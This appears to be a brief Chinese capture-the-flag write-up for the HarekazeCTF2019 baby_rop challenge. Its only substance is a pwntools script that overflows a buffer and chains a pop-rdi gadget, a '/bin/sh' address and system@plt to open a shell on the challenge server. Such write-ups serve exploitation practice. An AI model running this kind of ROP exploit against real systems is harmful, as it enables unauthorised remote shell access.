BUUCTF-[HarekazeCTF2019]baby_rop(11/100)
一、查保护
二、代码审计
三、过程
简单ROP
四、脚本
from pwn import *
#context(os='linux', arch='amd64', log_level='debug')
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
sla=lambda x,y:io.sendlineafter(x,y)
sl=lambda x:io.sendline(x)
rv=lambda x:io.recv(x)
#io = process('./')
io=remote('node3.buuoj.cn',25615)
#elf=ELF('./')
sl('a'*16+'b'*8+p64(0x0400683)+p64(0x0601048)+p64(0x400490))
io.interactive()
浙公网安备 33010602011771号